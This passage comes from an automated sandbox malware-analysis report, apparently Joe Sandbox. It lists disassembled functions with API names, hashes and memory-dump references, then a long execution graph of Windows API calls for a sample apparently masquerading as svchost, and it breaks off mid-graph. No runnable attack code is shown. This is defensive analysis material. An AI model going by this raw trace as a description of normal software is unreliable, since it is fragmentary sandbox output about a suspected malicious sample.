                                      • Instruction Fuzzy Hash: 91111932618B8182EB618F19F44026A77F5FB88B98F584230DECC4BB58DF3DD5558B40
                                      Function 00007FF669ABE3C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3CB
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF669ABE2C7,?,?,?,00007FF669AB398E,?,?,?), ref: 00007FF669ABE3D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1211598281-2248577382
                                      • Opcode ID: ca613bb110bc7e2d7e73c1113578bb410ad9a3da1ca73437c45ebd2c42cb4644
                                      • Instruction ID: 27b48fe76b11f5483a980fee04f248a1efdfeaff3d9d07f4d0b0f39ab36d9a11
                                      • Opcode Fuzzy Hash: ca613bb110bc7e2d7e73c1113578bb410ad9a3da1ca73437c45ebd2c42cb4644
                                      • Instruction Fuzzy Hash: 40E01A61E1984AC2E640AF249C8557532B2BF55330F900331D83EC95E1DF2CA509D341
                                      Function 00007FF669AB9644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 27688530daeaabcc01455478abd0328a1a7ecef62b4615ede859eb8aa962639a
                                      • Instruction ID: 433dd8345c89f99097488f52669adc8f74b2799d3b2e0d9e91ba35eb3ddfbdb2
                                      • Opcode Fuzzy Hash: 27688530daeaabcc01455478abd0328a1a7ecef62b4615ede859eb8aa962639a
                                      • Instruction Fuzzy Hash: 6DD01791B19686C2FF199FA9A44823523A15F69B81F480438CC0A8A394EE2C9188D700

                                      Execution Graph

                                      Execution Coverage:7.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:76
                                      execution_graph 7327 40aac0 7328 40aad8 7327->7328 7349 40d498 EnterCriticalSection 7328->7349 7330 40aaef 7331 40aca2 7330->7331 7332 40ab02 7330->7332 7333 40ab3e 7330->7333 7335 40ab19 7332->7335 7336 40ab1c CreateFileW 7332->7336 7334 40ab43 7333->7334 7339 40ab7c 7333->7339 7337 40ab5a 7334->7337 7338 40ab5d CreateFileW 7334->7338 7335->7336 7343 40abe8 7336->7343 7337->7338 7338->7343 7340 40aba7 CreateFileW 7339->7340 7339->7343 7342 40abc9 CreateFileW 7340->7342 7340->7343 7341 40ac70 7348 40ac81 7341->7348 7359 40d40a EnterCriticalSection 7341->7359 7342->7343 7343->7341 7345 40ac0e HeapAlloc 7343->7345 7346 40ac22 7343->7346 7345->7346 7346->7341 7347 40ac5c SetFilePointer 7346->7347 7347->7341 7350 40d4b2 7349->7350 7351 40d4c7 7349->7351 7367 40db72 HeapAlloc 7350->7367 7353 40d4ec 7351->7353 7354 40d4cc HeapReAlloc 7351->7354 7356 40d501 HeapAlloc 7353->7356 7357 40d4f5 7353->7357 7354->7353 7356->7357 7358 40d51d LeaveCriticalSection 7357->7358 7358->7330 7360 40d441 7359->7360 7361 40d422 7359->7361 7369 40db32 7360->7369 7361->7360 7362 40d427 7361->7362 7364 40d430 memset 7362->7364 7365 40d44d LeaveCriticalSection 7362->7365 7364->7365 7365->7331 7366 40d44b 7366->7365 7368 40d4c1 7367->7368 7368->7358 7370 40db43 HeapFree 7369->7370 7370->7366 10303 402e57 10304 40dfc0 21 API calls 10303->10304 10305 402e5d 10304->10305 10306 40a4f4 5 API calls 10305->10306 10307 402e68 10306->10307 10316 40de80 GetLastError TlsGetValue SetLastError 10307->10316 10309 402e6e 10317 40de80 GetLastError TlsGetValue SetLastError 10309->10317 10311 402e76 10312 409bc0 4 API calls 10311->10312 10313 402e81 10312->10313 10314 40dec0 3 API calls 10313->10314 10315 402e90 10314->10315 10316->10309 10317->10311 7372 401000 memset GetModuleHandleW HeapCreate 7373 401044 7372->7373 7425 40de30 HeapCreate TlsAlloc 7373->7425 7375 401053 7428 40aaa0 7375->7428 7377 40105d 7431 409b40 HeapCreate 7377->7431 7379 40106c 7432 409669 7379->7432 7381 401071 7437 408dee memset InitCommonControlsEx CoInitialize 7381->7437 7383 401076 7438 4053bb InitializeCriticalSection 7383->7438 7385 40107b 7439 405068 7385->7439 7389 4010c3 7442 40a3da 7389->7442 7393 4010e9 7394 40a3da 16 API calls 7393->7394 7395 4010f4 7394->7395 7396 40a348 13 API calls 7395->7396 7397 40110f 7396->7397 7453 40dbca 7397->7453 7399 40112d 7400 405068 4 API calls 7399->7400 7401 40113d 7400->7401 7402 40a3da 16 API calls 7401->7402 7403 401148 7402->7403 7404 40a348 13 API calls 7403->7404 7405 401163 7404->7405 7459 409930 7405->7459 7407 40116f 7465 40de80 GetLastError TlsGetValue SetLastError 7407->7465 7409 401175 7466 402f41 7409->7466 7413 401186 7491 401b8f 7413->7491 7416 401196 7839 403001 7416->7839 7417 40119b 7598 403df3 7417->7598 7970 40e6a0 HeapAlloc HeapAlloc TlsSetValue 7425->7970 7427 40de57 7427->7375 7971 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7428->7971 7430 40aaae 7430->7377 7431->7379 7972 40d353 7432->7972 7436 409687 InitializeCriticalSection 7436->7381 7437->7383 7438->7385 7982 40e130 7439->7982 7441 401095 GetStdHandle 7824 409de0 7441->7824 7443 40a3e3 7442->7443 7444 4010ce 7442->7444 7989 40a496 7443->7989 7834 40a348 HeapAlloc 7444->7834 7449 40a40e HeapFree 7449->7449 7452 40a420 7449->7452 7450 40a433 HeapFree 7450->7444 7451 40a427 HeapFree 7451->7450 7452->7450 7452->7451 8033 40dd1d 7453->8033 7456 40dbe7 RtlAllocateHeap 7457 40dc06 memset 7456->7457 7458 40dc4a 7456->7458 7457->7458 7458->7399 7460 409a50 7459->7460 7461 409a58 7460->7461 7462 409a7a SetUnhandledExceptionFilter 7460->7462 7463 409a61 SetUnhandledExceptionFilter 7461->7463 7464 409a6b SetUnhandledExceptionFilter 7461->7464 7462->7407 7463->7464 7464->7407 7465->7409 8039 40dfc0 7466->8039 7470 402f56 8054 40de80 GetLastError TlsGetValue SetLastError 7470->8054 7472 402fab 8055 40de80 GetLastError TlsGetValue SetLastError 7472->8055 7474 402fb3 8056 40de80 GetLastError TlsGetValue SetLastError 7474->8056 7476 402fbb 8057 40de80 GetLastError TlsGetValue SetLastError 7476->8057 7478 402fc3 8058 40d120 7478->8058 7482 402fde 8063 405eb0 7482->8063 7484 402fe6 8073 405170 TlsGetValue 7484->8073 7486 40117c 7487 40dec0 TlsGetValue 7486->7487 7488 40df06 RtlReAllocateHeap 7487->7488 7489 40dee9 RtlAllocateHeap 7487->7489 7490 40df27 7488->7490 7489->7490 7490->7413 7492 40dfc0 21 API calls 7491->7492 7493 401b9e 7492->7493 8098 40de80 GetLastError TlsGetValue SetLastError 7493->8098 7495 401ba4 8099 40de80 GetLastError TlsGetValue SetLastError 7495->8099 7497 401bb6 8100 40de80 GetLastError TlsGetValue SetLastError 7497->8100 7499 401bbe 8101 409698 7499->8101 7503 401bca LoadLibraryExW 7504 4051a0 3 API calls 7503->7504 7505 401bd7 EnumResourceTypesW FreeLibrary 7504->7505 7522 401c02 7505->7522 7506 401e16 7506->7506 7507 401ca0 7508 40a496 4 API calls 7507->7508 7509 401cab 7508->7509 8109 40de80 GetLastError TlsGetValue SetLastError 7509->8109 7511 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7511->7522 7512 401cb1 8110 40de80 GetLastError TlsGetValue SetLastError 7512->8110 7514 401cb9 8111 40de80 GetLastError TlsGetValue SetLastError 7514->8111 7516 401cc1 8112 40de80 GetLastError TlsGetValue SetLastError 7516->8112 7518 40de80 GetLastError TlsGetValue SetLastError 7518->7522 7519 401cc9 8113 40de80 GetLastError TlsGetValue SetLastError 7519->8113 7521 401cd6 8114 40de80 GetLastError TlsGetValue SetLastError 7521->8114 7522->7506 7522->7507 7522->7511 7522->7518 7527 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7522->7527 7524 401cde 8115 405e10 7524->8115 7527->7522 7529 401cee 8124 40d100 7529->8124 7533 401cfb 7534 405eb0 6 API calls 7533->7534 7535 401d03 7534->7535 7536 40dec0 3 API calls 7535->7536 7537 401d0d 7536->7537 8128 40de80 GetLastError TlsGetValue SetLastError 7537->8128 7539 401d17 8129 40e020 7539->8129 7541 401d1f 7542 40dec0 3 API calls 7541->7542 7543 401d29 7542->7543 8134 40de80 GetLastError TlsGetValue SetLastError 7543->8134 7545 401d2f 8135 40de80 GetLastError TlsGetValue SetLastError 7545->8135 7547 401d37 8136 40de80 GetLastError TlsGetValue SetLastError 7547->8136 7549 401d3f 8137 40de80 GetLastError TlsGetValue SetLastError 7549->8137 7551 401d47 7552 40d100 8 API calls 7551->7552 7553 401d57 7552->7553 8138 405182 TlsGetValue 7553->8138 7555 401d5c 7556 405eb0 6 API calls 7555->7556 7557 401d64 7556->7557 7558 40dec0 3 API calls 7557->7558 7559 401d6e 7558->7559 8139 40de80 GetLastError TlsGetValue SetLastError 7559->8139 7561 401d74 8140 40de80 GetLastError TlsGetValue SetLastError 7561->8140 7563 401d7c 8141 405f20 7563->8141 7565 401d8c 7566 40dec0 3 API calls 7565->7566 7567 401d96 7566->7567 7567->7506 8149 40985e 7567->8149 7570 401e12 7573 40df50 HeapFree 7570->7573 7572 401db5 8155 40de80 GetLastError TlsGetValue SetLastError 7572->8155 7575 401e2b 7573->7575 7577 40df50 HeapFree 7575->7577 7576 401dbd 8156 409872 7576->8156 7579 401e34 7577->7579 7581 40df50 HeapFree 7579->7581 7583 401e3d 7581->7583 7585 40df50 HeapFree 7583->7585 7584 401dce 8166 405160 7584->8166 7586 401e46 7585->7586 7588 40df50 HeapFree 7586->7588 7589 40118b 7588->7589 7589->7416 7589->7417 7590 401dd9 7590->7570 8169 40de80 GetLastError TlsGetValue SetLastError 7590->8169 7592 401df2 8170 40de80 GetLastError TlsGetValue SetLastError 7592->8170 7594 401dfa 7595 409872 21 API calls 7594->7595 7596 401e06 7595->7596 7597 40dec0 3 API calls 7596->7597 7597->7570 7599 403df9 7598->7599 7599->7599 7600 40dfc0 21 API calls 7599->7600 7615 403e0b 7600->7615 7601 405dc0 3 API calls 7601->7615 7602 40de80 GetLastError TlsGetValue SetLastError 7622 403e8c 7602->7622 7603 40de80 GetLastError TlsGetValue SetLastError 7629 403f0d 7603->7629 7604 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7604->7615 7605 405dc0 3 API calls 7605->7622 7606 40de80 GetLastError TlsGetValue SetLastError 7606->7615 7607 405dc0 3 API calls 7607->7629 7608 40de80 GetLastError TlsGetValue SetLastError 7646 404090 7608->7646 7609 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7609->7615 7610 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7610->7629 7611 405dc0 3 API calls 7634 403f8e 7611->7634 7612 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7612->7634 7614 40de80 GetLastError TlsGetValue SetLastError 7640 404115 7614->7640 7615->7601 7615->7604 7615->7606 7615->7609 7615->7622 7616 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7616->7622 7617 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7617->7629 7618 40de80 GetLastError TlsGetValue SetLastError 7618->7634 7619 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7639 40400f 7619->7639 7620 405dc0 3 API calls 7620->7646 7621 40de80 GetLastError TlsGetValue SetLastError 7647 40419a 7621->7647 7622->7602 7622->7605 7622->7616 7624 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7622->7624 7622->7629 7623 4042a4 8203 40de80 GetLastError TlsGetValue SetLastError 7623->8203 7624->7622 7625 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7625->7634 7626 40de80 GetLastError TlsGetValue SetLastError 7626->7639 7627 405dc0 3 API calls 7627->7640 7629->7603 7629->7607 7629->7610 7629->7617 7629->7634 7630 4042b0 7633 40e020 4 API calls 7630->7633 7631 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7631->7640 7632 405dc0 3 API calls 7632->7647 7635 4042b8 7633->7635 7634->7611 7634->7612 7634->7618 7634->7625 7634->7639 7638 40e020 4 API calls 7635->7638 7636 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7636->7639 7637 405dc0 3 API calls 7641 40421f 7637->7641 7642 4042c2 7638->7642 7639->7619 7639->7626 7639->7636 7639->7646 8200 405dc0 7639->8200 7640->7614 7640->7627 7640->7631 7640->7647 7652 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7640->7652 7641->7623 7641->7637 7649 40de80 GetLastError TlsGetValue SetLastError 7641->7649 7657 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7641->7657 7660 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7641->7660 7643 40dec0 3 API calls 7642->7643 7645 4042ce 7643->7645 7644 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7644->7646 8204 40de80 GetLastError TlsGetValue SetLastError 7645->8204 7646->7608 7646->7620 7646->7640 7646->7644 7651 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7646->7651 7647->7621 7647->7632 7647->7641 7648 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7647->7648 7656 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7647->7656 7648->7647 7649->7641 7651->7646 7652->7640 7653 4042d4 8205 403275 7653->8205 7656->7647 7657->7641 7658 40dec0 3 API calls 7659 4042ed 7658->7659 7661 40985e 17 API calls 7659->7661 7660->7641 7662 4042f2 GetModuleHandleW 7661->7662 8298 40de80 GetLastError TlsGetValue SetLastError 7662->8298 7664 40430b 8299 40de80 GetLastError TlsGetValue SetLastError 7664->8299 7666 404313 8300 40de80 GetLastError TlsGetValue SetLastError 7666->8300 7668 40431b 8301 40de80 GetLastError TlsGetValue SetLastError 7668->8301 7670 404323 7671 40d100 8 API calls 7670->7671 7672 404335 7671->7672 8302 405182 TlsGetValue 7672->8302 7674 40433a 7675 405eb0 6 API calls 7674->7675 7676 404342 7675->7676 7677 40dec0 3 API calls 7676->7677 7678 40434c 7677->7678 8303 40de80 GetLastError TlsGetValue SetLastError 7678->8303 7680 404352 8304 40de80 GetLastError TlsGetValue SetLastError 7680->8304 7682 40435a 8305 40de80 GetLastError TlsGetValue SetLastError 7682->8305 7684 404362 8306 40de80 GetLastError TlsGetValue SetLastError 7684->8306 7686 40436a 7687 40d100 8 API calls 7686->7687 7688 40437a 7687->7688 8307 405182 TlsGetValue 7688->8307 7690 40437f 7691 405eb0 6 API calls 7690->7691 7692 404387 7691->7692 7693 40dec0 3 API calls 7692->7693 7694 404391 7693->7694 8308 402e9d 7694->8308 7698 4043a4 8325 4021a4 7698->8325 7701 4051a0 3 API calls 7702 4043b4 7701->7702 8439 40195b 7702->8439 7708 4043c8 8530 40358d 7708->8530 7711 40dec0 3 API calls 7712 4043ee PathRemoveBackslashW 7711->7712 7713 404402 7712->7713 8658 40de80 GetLastError TlsGetValue SetLastError 7713->8658 7715 404408 8659 40de80 GetLastError TlsGetValue SetLastError 7715->8659 7717 404410 8660 402bfa 7717->8660 7721 404422 8690 405182 TlsGetValue 7721->8690 7723 40442b 8691 4098c0 7723->8691 7726 4051a0 3 API calls 7727 404439 7726->7727 8695 40de80 GetLastError TlsGetValue SetLastError 7727->8695 7729 404445 7730 40e020 4 API calls 7729->7730 7731 40444d 7730->7731 7732 40e020 4 API calls 7731->7732 7733 404459 7732->7733 7734 40dec0 3 API calls 7733->7734 7735 404465 7734->7735 8696 40de80 GetLastError TlsGetValue SetLastError 7735->8696 7737 40446b 8697 401e55 7737->8697 7740 40dec0 3 API calls 7741 404480 7740->7741 8743 403855 7741->8743 7745 404491 7746 40e020 4 API calls 7745->7746 7747 404499 7746->7747 7748 40dec0 3 API calls 7747->7748 7749 4044a3 PathQuoteSpacesW 7748->7749 8937 40de80 GetLastError TlsGetValue SetLastError 7749->8937 7751 4044b6 7752 40e020 4 API calls 7751->7752 7753 4044be 7752->7753 7754 40e020 4 API calls 7753->7754 7755 4044c9 7754->7755 7756 40e020 4 API calls 7755->7756 7757 4044d3 7756->7757 7758 40dec0 3 API calls 7757->7758 7759 4044dd PathQuoteSpacesW 7758->7759 7760 4044f1 7759->7760 7761 404509 7759->7761 8974 405492 CreateThread 7760->8974 8984 402ca9 7761->8984 7765 404512 8938 40de80 GetLastError TlsGetValue SetLastError 7765->8938 7767 404518 8939 40de80 GetLastError TlsGetValue SetLastError 7767->8939 10157 409ecf 7824->10157 7827 409ea4 7827->7389 7828 409e0b HeapAlloc 7830 409e93 HeapFree 7828->7830 7831 409e2e 7828->7831 7830->7827 10168 40d819 7831->10168 7835 40a367 HeapAlloc 7834->7835 7836 40a37c 7834->7836 7835->7836 7837 40d819 11 API calls 7836->7837 7838 40a3cf 7837->7838 7838->7393 7840 40dfc0 21 API calls 7839->7840 7841 40300e 7840->7841 10201 40de80 GetLastError TlsGetValue SetLastError 7841->10201 7843 403014 10202 40de80 GetLastError TlsGetValue SetLastError 7843->10202 7845 40301c 10203 40de80 GetLastError TlsGetValue SetLastError 7845->10203 7847 403024 10204 40de80 GetLastError TlsGetValue SetLastError 7847->10204 7849 40302c 7850 40d100 8 API calls 7849->7850 7851 40303e 7850->7851 10205 405182 TlsGetValue 7851->10205 7853 403043 7854 405eb0 6 API calls 7853->7854 7855 40304b 7854->7855 7856 40dec0 3 API calls 7855->7856 7857 403055 7856->7857 10206 40de80 GetLastError TlsGetValue SetLastError 7857->10206 7859 40305b 10207 40de80 GetLastError TlsGetValue SetLastError 7859->10207 7861 403063 10208 40de80 GetLastError TlsGetValue SetLastError 7861->10208 7863 40306b 10209 40de80 GetLastError TlsGetValue SetLastError 7863->10209 7865 403073 7866 40d100 8 API calls 7865->7866 7867 403083 7866->7867 10210 405182 TlsGetValue 7867->10210 7869 403088 7870 405eb0 6 API calls 7869->7870 7871 403090 7870->7871 7872 40dec0 3 API calls 7871->7872 7873 40309a 7872->7873 7874 402e9d 35 API calls 7873->7874 7875 4030a2 7874->7875 10211 40de80 GetLastError TlsGetValue SetLastError 7875->10211 7877 4030ac 7878 4021a4 122 API calls 7877->7878 7879 4030b7 7878->7879 7880 4051a0 3 API calls 7879->7880 7881 4030bc 7880->7881 10212 40de80 GetLastError TlsGetValue SetLastError 7881->10212 7883 4030c2 10213 40de80 GetLastError TlsGetValue SetLastError 7883->10213 7885 4030ca 7886 409355 33 API calls 7885->7886 7887 4030dd 7886->7887 7888 40dec0 3 API calls 7887->7888 7889 4030e7 7888->7889 7890 40323e 7889->7890 10214 40de80 GetLastError TlsGetValue SetLastError 7889->10214 7890->7890 7892 4030fe 10215 40de80 GetLastError TlsGetValue SetLastError 7892->10215 7894 403106 10216 40de80 GetLastError TlsGetValue SetLastError 7894->10216 7896 40310e 10217 40de80 GetLastError TlsGetValue SetLastError 7896->10217 7898 403116 7899 40d100 8 API calls 7898->7899 7900 403128 7899->7900 10218 405182 TlsGetValue 7900->10218 7902 40312d 7903 405eb0 6 API calls 7902->7903 7904 403135 7903->7904 7905 40dec0 3 API calls 7904->7905 7906 40313f 7905->7906 10219 40de80 GetLastError TlsGetValue SetLastError 7906->10219 7908 403145 10220 40de80 GetLastError TlsGetValue SetLastError 7908->10220 7910 40314d 10221 40de80 GetLastError TlsGetValue SetLastError 7910->10221 7912 403155 10222 40de80 GetLastError TlsGetValue SetLastError 7912->10222 7914 40315d 7915 40d100 8 API calls 7914->7915 7916 40316f 7915->7916 10223 405182 TlsGetValue 7916->10223 7918 403174 7919 405eb0 6 API calls 7918->7919 7920 40317c 7919->7920 7921 40dec0 3 API calls 7920->7921 7922 403186 7921->7922 10224 40de80 GetLastError TlsGetValue SetLastError 7922->10224 7924 40318c 7925 403cd7 84 API calls 7924->7925 7926 40319c 7925->7926 7927 40dec0 3 API calls 7926->7927 7928 4031a8 7927->7928 10225 40de80 GetLastError TlsGetValue SetLastError 7928->10225 7930 4031ae 7931 403cd7 84 API calls 7930->7931 7932 4031be 7931->7932 7933 40dec0 3 API calls 7932->7933 7934 4031c8 PathAddBackslashW 7933->7934 10226 40de80 GetLastError TlsGetValue SetLastError 7934->10226 7936 4031d7 10227 40de80 GetLastError TlsGetValue SetLastError 7936->10227 7938 4031e7 7939 40e020 4 API calls 7938->7939 7940 4031ef 7939->7940 7941 40e020 4 API calls 7940->7941 7942 4031fb 7941->7942 10228 405182 TlsGetValue 7942->10228 7944 403200 7945 40240c 34 API calls 7944->7945 7946 403208 7945->7946 7947 4051a0 3 API calls 7946->7947 7948 40320d 7947->7948 10229 40de80 GetLastError TlsGetValue SetLastError 7948->10229 7950 403217 7951 40e020 4 API calls 7950->7951 7952 40321f 7951->7952 7953 40dec0 3 API calls 7952->7953 7954 40322b PathRemoveBackslashW 7953->7954 7955 402ca9 141 API calls 7954->7955 7955->7890 7970->7427 7971->7430 7973 40d362 7972->7973 7974 40d3a0 TlsGetValue HeapReAlloc TlsSetValue 7973->7974 7975 40d378 TlsAlloc HeapAlloc TlsSetValue 7973->7975 7976 40d3e0 7974->7976 7977 40d3dc 7974->7977 7975->7974 7979 40db72 HeapAlloc 7976->7979 7977->7976 7978 409674 7977->7978 7981 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7978->7981 7980 40d3ec 7979->7980 7980->7978 7981->7436 7983 40e141 wcslen 7982->7983 7984 40e1ad 7982->7984 7986 40e176 HeapReAlloc 7983->7986 7987 40e158 HeapAlloc 7983->7987 7985 40e1b5 HeapFree 7984->7985 7988 40e198 7984->7988 7985->7988 7986->7988 7987->7988 7988->7441 7990 40a4c6 7989->7990 7994 40a4a7 7989->7994 7991 40a3eb 7990->7991 7992 40d74b 3 API calls 7990->7992 7996 40d946 7991->7996 7992->7990 7994->7991 8009 411d8a 7994->8009 8014 40d74b 7994->8014 7997 40d953 EnterCriticalSection 7996->7997 7998 40d9b8 7996->7998 7999 40d9ae LeaveCriticalSection 7997->7999 8000 40d96f 7997->8000 8024 40d6dd 7998->8024 8003 40a3f3 7999->8003 8002 40d946 4 API calls 8000->8002 8007 40d979 HeapFree 8002->8007 8003->7449 8003->7452 8005 40d9c4 DeleteCriticalSection 8006 40d9ce HeapFree 8005->8006 8006->8003 8007->7999 8010 411e85 8009->8010 8011 411da2 8009->8011 8010->7994 8011->8010 8013 411d8a HeapFree 8011->8013 8021 40df50 8011->8021 8013->8011 8015 40d758 EnterCriticalSection 8014->8015 8019 40d762 8014->8019 8015->8019 8016 40d7cb 8017 40d814 8016->8017 8018 40d80a LeaveCriticalSection 8016->8018 8017->7994 8018->8017 8019->8016 8020 40d7b5 HeapFree 8019->8020 8020->8016 8022 40df5b HeapFree 8021->8022 8023 40df6e 8021->8023 8022->8023 8023->8011 8025 40d6f5 8024->8025 8026 40d6eb EnterCriticalSection 8024->8026 8027 40d712 8025->8027 8028 40d6fc HeapFree 8025->8028 8026->8025 8029 40d718 HeapFree 8027->8029 8030 40d72e 8027->8030 8028->8027 8028->8028 8029->8029 8029->8030 8031 40d745 8030->8031 8032 40d73b LeaveCriticalSection 8030->8032 8031->8005 8031->8006 8032->8031 8034 40dbdb 8033->8034 8038 40dd26 8033->8038 8034->7456 8034->7458 8035 40dd51 HeapFree 8035->8034 8036 40dd4f 8036->8035 8037 411d8a HeapFree 8037->8038 8038->8035 8038->8036 8038->8037 8040 40dfea TlsGetValue 8039->8040 8041 40dfcc 8039->8041 8043 402f4d 8040->8043 8044 40dffb 8040->8044 8042 40de30 5 API calls 8041->8042 8045 40dfd1 TlsGetValue 8042->8045 8051 4051a0 8043->8051 8083 40e6a0 HeapAlloc HeapAlloc TlsSetValue 8044->8083 8074 412082 8045->8074 8048 40e000 TlsGetValue 8049 412082 13 API calls 8048->8049 8049->8043 8084 40e780 GetLastError TlsGetValue SetLastError 8051->8084 8053 4051ab 8053->7470 8054->7472 8055->7474 8056->7476 8057->7478 8060 40d12d 8058->8060 8085 40d220 8060->8085 8062 405182 TlsGetValue 8062->7482 8064 405ebd 8063->8064 8095 40e1e0 TlsGetValue 8064->8095 8067 40e260 3 API calls 8068 405ed1 8067->8068 8069 405edd 8068->8069 8097 40e370 TlsGetValue 8068->8097 8070 405f0d 8069->8070 8072 405f00 CharUpperW 8069->8072 8070->7484 8072->7484 8073->7486 8075 412092 TlsAlloc InitializeCriticalSection 8074->8075 8076 4120ae TlsGetValue 8074->8076 8075->8076 8077 4120c4 HeapAlloc 8076->8077 8078 41214b HeapAlloc 8076->8078 8079 40dfe8 8077->8079 8080 4120de EnterCriticalSection 8077->8080 8078->8079 8079->8043 8081 4120f0 7 API calls 8080->8081 8082 4120ee 8080->8082 8081->8078 8082->8081 8083->8048 8084->8053 8086 40d22c 8085->8086 8089 40e260 TlsGetValue 8086->8089 8090 40e27b 8089->8090 8091 40e2a1 HeapReAlloc 8090->8091 8092 40e2d4 8090->8092 8093 402fd9 8091->8093 8092->8093 8094 40e2f0 HeapReAlloc 8092->8094 8093->8062 8094->8093 8096 405ec5 8095->8096 8096->8067 8097->8069 8098->7495 8099->7497 8100->7499 8102 40e260 3 API calls 8101->8102 8103 4096aa GetModuleFileNameW wcscmp 8102->8103 8104 4096e5 8103->8104 8105 4096cd memmove 8103->8105 8171 40e3f0 TlsGetValue 8104->8171 8105->8104 8107 401bc5 8108 405182 TlsGetValue 8107->8108 8108->7503 8109->7512 8110->7514 8111->7516 8112->7519 8113->7521 8114->7524 8116 405e1d 8115->8116 8117 40e1e0 TlsGetValue 8116->8117 8118 405e40 8117->8118 8119 40e260 3 API calls 8118->8119 8120 405e4c 8119->8120 8121 401ce9 8120->8121 8172 40e370 TlsGetValue 8120->8172 8123 405182 TlsGetValue 8121->8123 8123->7529 8173 40d080 8124->8173 8127 405182 TlsGetValue 8127->7533 8128->7539 8130 40e042 8129->8130 8131 40e033 wcslen 8129->8131 8132 40e260 3 API calls 8130->8132 8131->8130 8133 40e04d 8132->8133 8133->7541 8134->7545 8135->7547 8136->7549 8137->7551 8138->7555 8139->7561 8140->7563 8142 405f2e 8141->8142 8143 40e1e0 TlsGetValue 8142->8143 8144 405f4a 8143->8144 8145 40e260 3 API calls 8144->8145 8146 405f56 8145->8146 8147 405f62 8146->8147 8188 40e370 TlsGetValue 8146->8188 8147->7565 8189 40d2e8 TlsGetValue 8149->8189 8154 40de80 GetLastError TlsGetValue SetLastError 8154->7572 8155->7576 8157 40d2e8 16 API calls 8156->8157 8158 409885 8157->8158 8159 40973a 17 API calls 8158->8159 8160 409898 8159->8160 8161 40e260 3 API calls 8160->8161 8162 4098a6 8161->8162 8198 40e3f0 TlsGetValue 8162->8198 8164 401dc9 8165 40e080 TlsGetValue 8164->8165 8165->7584 8199 40e740 TlsGetValue 8166->8199 8168 40516a 8168->7590 8169->7592 8170->7594 8171->8107 8172->8121 8176 40d092 8173->8176 8174 40d0dd 8175 40d220 3 API calls 8174->8175 8177 401cf6 8175->8177 8176->8174 8181 4121a0 8176->8181 8177->8127 8179 40d0b8 8187 412190 free 8179->8187 8182 412214 malloc 8181->8182 8183 4121ac WideCharToMultiByte 8181->8183 8182->8179 8183->8182 8185 4121e0 malloc 8183->8185 8185->8182 8186 4121f2 WideCharToMultiByte 8185->8186 8186->8179 8187->8174 8188->8147 8190 409869 8189->8190 8191 40d2fb HeapAlloc TlsSetValue 8189->8191 8194 40973a 8190->8194 8192 40d327 8191->8192 8193 412082 13 API calls 8192->8193 8193->8190 8195 40d2e8 16 API calls 8194->8195 8196 40974b GetCommandLineW 